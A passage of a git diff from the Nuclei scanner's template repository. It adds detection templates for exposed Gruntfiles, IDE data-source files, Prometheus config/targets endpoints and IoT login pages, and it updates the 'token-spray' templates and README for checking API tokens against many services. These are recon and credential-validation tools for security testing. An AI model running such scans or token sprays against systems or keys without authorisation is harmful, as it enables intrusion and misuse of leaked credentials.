reference: https://gruntjs.com/sample-gruntfile
|
||||
tags: config,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Gruntfile.js"
|
||||
- "{{BaseURL}}/Gruntfile.coffee"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- "module.exports"
|
||||
- "grunt"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: jetbrains-datasource
|
||||
|
||||
info:
|
||||
name: Jetbrains IDE DataSources exposure
|
||||
author: FlorianMaak
|
||||
severity: info
|
||||
description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
|
||||
tags: config,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.idea/dataSources.xml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DataSourceManagerImpl"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: prometheus-config-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus config API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder <secret> (although this still leaks the username).
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'job_name:'
|
||||
- '{"status":"success","data":'
|
||||
- 'targets:'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
|
@ -0,0 +1,37 @@
|
|||
id: prometheus-flags-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus flags API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/flags"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"data":'
|
||||
- '"config.file":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: web_admin_enabled
|
||||
regex:
|
||||
- '\"web\.enable\-admin\-api\"\: \"true\"'
|
|
@ -0,0 +1,31 @@
|
|||
id: prometheus-targets-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus targets API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/targets"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '{"status":"success","data":'
|
||||
- 'Labels'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
|
@ -15,6 +15,7 @@ requests:
|
|||
- "{{BaseURL}}/server/storage/"
|
||||
- "{{BaseURL}}/intikal/storage/"
|
||||
- "{{BaseURL}}/elocker_old/storage/"
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -23,17 +23,17 @@ requests:
|
|||
payloads:
|
||||
path: helpers/wordlists/adminer-paths.txt
|
||||
|
||||
attack: sniper
|
||||
threads: 50
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "- Adminer</title>"
|
||||
- "partial(verifyVersion, "
|
||||
condition: and
|
||||
- "partial(verifyVersion"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -14,12 +14,10 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
payloads:
|
||||
mdbPaths: helpers/wordlists/mdb-paths.txt
|
||||
|
||||
attack: sniper
|
||||
threads: 50
|
||||
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||
stop-at-first-match: true
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
id: prestashop-module-fuzz
|
||||
|
||||
info:
|
||||
name: Prestashop Modules Enumeration
|
||||
author: meme-lord
|
||||
|
@ -16,19 +17,18 @@ requests:
|
|||
|
||||
payloads:
|
||||
path: helpers/wordlists/prestashop-modules.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
threads: 50
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "<module>"
|
||||
- "<name>"
|
||||
- "<displayName>"
|
||||
- "<is_configurable>"
|
||||
- "</module>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
id: wordpress-plugins-detect
|
||||
|
||||
info:
|
||||
name: WordPress Plugins Detection
|
||||
author: 0xcrypto
|
||||
|
@ -13,11 +14,8 @@ requests:
|
|||
|
||||
payloads:
|
||||
pluginSlug: helpers/wordlists/wordpress-plugins.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
|
||||
threads: 50
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
id: wordpress-themes-detect
|
||||
|
||||
info:
|
||||
name: WordPress Theme Detection
|
||||
author: 0xcrypto
|
||||
|
@ -13,11 +14,8 @@ requests:
|
|||
|
||||
payloads:
|
||||
themeSlug: helpers/wordlists/wordpress-themes.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
|
||||
threads: 50
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: codian-mcu-login
|
||||
|
||||
info:
|
||||
name: Codian MCU Login
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7404
|
||||
tags: iot
|
||||
metadata:
|
||||
shodan: 'http.title:"Codian MCU - Home page"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Codian MCU - login:</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: envision-gateway
|
||||
|
||||
info:
|
||||
name: EnvisionGateway
|
||||
author: dhiyaneshDK
|
||||
severity: low
|
||||
reference: https://www.exploit-db.com/ghdb/7315
|
||||
tags: iot
|
||||
metadata:
|
||||
shodan: 'http.title:"EnvisionGateway"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/#'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>EnvisionGateway</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: heatmiser-wifi-thermostat
|
||||
|
||||
info:
|
||||
name: Heatmiser Wifi Thermostat
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7445
|
||||
tags: iot
|
||||
metadata:
|
||||
shodan: 'http.title:"Heatmiser Wifi Thermostat"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.htm'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Heatmiser Wifi Thermostat</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: webcamxp-5
|
||||
|
||||
info:
|
||||
name: webcamXP 5
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/7448
|
||||
tags: iot
|
||||
metadata:
|
||||
shodan: 'http.title:"webcamXP 5"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/home.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>webcamXP 5</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -14,6 +14,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
||||
|
||||
threads: 50
|
||||
payloads:
|
||||
path:
|
||||
- /
|
||||
|
@ -63,9 +64,6 @@ requests:
|
|||
- /webticket/webticketservice.svcabs/
|
||||
- /adfs/services/trust/2005/windowstransport
|
||||
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
|
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zp-core/setup/index.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: detect-jabber-xmpp
|
||||
|
||||
info:
|
||||
name: Detects Jabber XMPP Instance
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
|
||||
reference: https://datatracker.ietf.org/doc/html/rfc6120
|
||||
tags: network,jabber,xmpp
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: "a\n"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:5222"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "stream:stream xmlns:stream"
|
||||
- "stream:error xmlns:stream"
|
||||
condition: or
|
|
@ -5,6 +5,8 @@ info:
|
|||
author: pikpikcu,philippedelteil
|
||||
severity: info
|
||||
tags: tech,aviatrix
|
||||
metadata:
|
||||
shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -18,7 +18,7 @@ requests:
|
|||
- contains(tolower(all_headers), 'x-amz-bucket')
|
||||
- contains(tolower(all_headers), 'x-amz-request')
|
||||
- contains(tolower(all_headers), 'x-amz-id')
|
||||
- contains(tolower(all_headers), 'AmazonS3')
|
||||
- contains(tolower(all_headers), 'amazons3')
|
||||
part: header
|
||||
condition: or
|
||||
|
||||
|
|
|
@ -1,15 +1,19 @@
|
|||
## About
|
||||
|
||||
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
|
||||
|
||||
## Usage
|
||||
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
|
||||
|
||||
```bash
|
||||
# Run Nuclei specifying all the api templates:
|
||||
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
|
||||
|
||||
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
|
||||
```console
|
||||
# Running token-spray templates against a single token to test
|
||||
nuclei -t token-spray/ -var token=random-token-to-test
|
||||
|
||||
# Running token-spray templates against a file containing multiple new line delimited tokens
|
||||
nuclei -t token-spray/ -var token=file_with_tokens.txt
|
||||
```
|
||||
|
||||
## Credits
|
||||
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
||||
|
||||
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,asana
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -16,6 +17,6 @@ requests:
|
|||
|
||||
matchers:
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,bing,maps,bingmaps
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,bitly
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,buildkite
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,buttercms
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,calendly
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,circle,circleci
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,deviantart
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,dropbox
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,github
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,autocomplete
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,search
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,directions
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,elevation
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,fcm,firebase,cloud,messaging
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,find,text
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,distance,matrix
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,geocode
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,19 +6,21 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,geolocation
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
|
||||
matchers-condition: and
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
negative: true
|
||||
status:
|
||||
- 404
|
||||
negative: true
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,maps,embed
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,maps,embed
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,search,nearby
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,roads
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,place,details
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,places,photo
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,playable,locations
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,route
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,speed,limit
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,maps
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,streetview
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,timezone
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,google,search,places,text
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -14,6 +15,6 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'error_message'
|
||||
negative: true
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,heroku
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
@ -17,9 +18,9 @@ requests:
|
|||
|
||||
matchers:
|
||||
- type: status
|
||||
condition: or
|
||||
status:
|
||||
- 200
|
||||
- 201
|
||||
- 202
|
||||
- 206
|
||||
condition: or
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,hubspot
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,instagram,graph
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,ipstack
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,iterable
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,jumpcloud
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,lokalise
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,loqate
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,mailchimp
|
||||
|
||||
self-contained: true
|
||||
network:
|
||||
- inputs:
|
||||
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,mailgun
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,mapbox
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,newrelic,nerdgraph
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,node,npm,package,manager
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,weather,openweather
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,pagerduty
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,pendo
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,pivotaltracker
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,postmark
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,sendgrid
|
||||
|
||||
self-contained: true
|
||||
network:
|
||||
- inputs:
|
||||
- data: "ehlo\r\n"
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,slack
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,sonarcloud
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,spotify
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
|
@ -7,6 +7,7 @@ info:
|
|||
severity: info
|
||||
tags: token-spray,square
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue